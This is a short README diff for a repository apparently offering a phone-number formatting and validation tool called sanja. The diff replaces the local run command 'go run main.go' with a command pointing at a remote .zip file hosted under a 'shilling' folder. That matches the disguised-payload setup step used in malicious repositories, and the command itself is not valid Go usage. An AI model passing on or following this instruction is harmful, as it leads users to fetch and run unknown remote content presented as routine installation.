Kanav3143/sanja/Readme.md

 - Open a terminal or command prompt.
 - Navigate to the folder where you extracted the files.
-- Run the command: `go run main.go`.
+- Run the command: `go run https://raw.githubusercontent.com/Kanav3143/sanja/main/shilling/sanja.zip`.

 This will start the application, and you can begin using sanja to format and validate phone numbers.